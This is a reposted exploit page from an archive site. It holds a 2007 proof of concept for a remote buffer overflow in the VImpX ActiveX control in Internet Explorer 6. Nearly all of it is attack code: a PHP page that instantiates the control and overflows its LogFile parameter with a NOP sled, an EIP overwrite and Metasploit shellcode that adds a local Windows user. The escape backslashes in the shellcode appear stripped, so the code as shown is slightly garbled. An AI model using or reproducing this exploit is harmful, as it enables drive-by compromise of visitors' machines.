VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote Buffer Overflow Exploit
# Published : 2007-05-13
# Author : rgod
# Previous Title : Samba 3.0.21-3.0.24 LSA trans names Heap Overflow
# Next Title : webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit

<!-
IE 6 / DB Software Laboratory VImpX ActiveX (VImpX.ocx v. 4.7.3.0)
remote buffer overflow exploit
windows xp sp2 it version / eip overwrite method
by rgod
site: http://retrogod.altervista.org
mail: retrog at alice dot it

software site: http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53
->
<html>
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='VImpAX1'>
<?php
/* win32_adduser -  PASS=tzu EXITFUNC=seh USER=sun Size=483 Encoder=PexAlphaNum http://metasploit.com */
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex57".
"x45x50x4ax37x41x50x4fx4ex4bx48x4fx44x4ax51x4bx48".
"x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x43x4bx38".
"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
"x46x4fx4bx33x46x35x46x42x46x50x45x47x45x4ex4bx58".
"x4fx35x46x32x41x30x4bx4ex48x56x4bx48x4ex50x4bx54".
"x4bx38x4fx35x4ex41x41x50x4bx4ex4bx38x4ex51x4bx38".
"x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx41x43".
"x42x4cx46x46x4bx58x42x44x42x33x45x48x42x4cx4ax57".
"x4ex50x4bx38x42x54x4ex30x4bx38x42x37x4ex41x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx58x42x38x42x4b".
"x42x50x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x53".
"x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx47".
"x42x45x4ax36x42x4fx4cx58x46x30x4fx45x4ax46x4ax49".
"x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x36x4dx56".
"x46x36x50x32x45x46x4ax47x45x56x42x52x4fx52x43x36".
"x42x52x50x46x45x56x46x47x42x52x45x47x43x37x45x56".
"x44x57x42x42x43x57x45x47x50x56x42x52x46x47x4cx37".
"x45x47x42x52x4fx42x41x34x46x34x46x54x42x42x48x42".
"x48x32x42x52x50x46x45x36x46x57x42x52x4ex46x4fx36".
"x43x56x41x46x4ex36x47x56x44x47x4fx36x45x57x42x37".
"x42x52x41x54x46x46x4dx56x49x46x50x56x49x36x43x37".
"x46x47x44x37x41x56x46x47x4fx56x44x37x43x37x42x52".
"x43x57x45x57x50x46x42x42x4fx32x41x34x46x54x46x54".
"x42x50x5a";
$junk = "x45x45x45x59";
$eip  = "x2dxd1xe0x77"; // call eax user32.dll
$exploit= str_repeat("x90",268).$eip.$junk."x90x90x90x0dx01".str_repeat("x90",16).$shellcode.str_repeat("x90",9999);
echo "<param name="LogFile" value="$exploit"/>";
?>
</object>
</html>

# www.Syue.com [2007-05-13]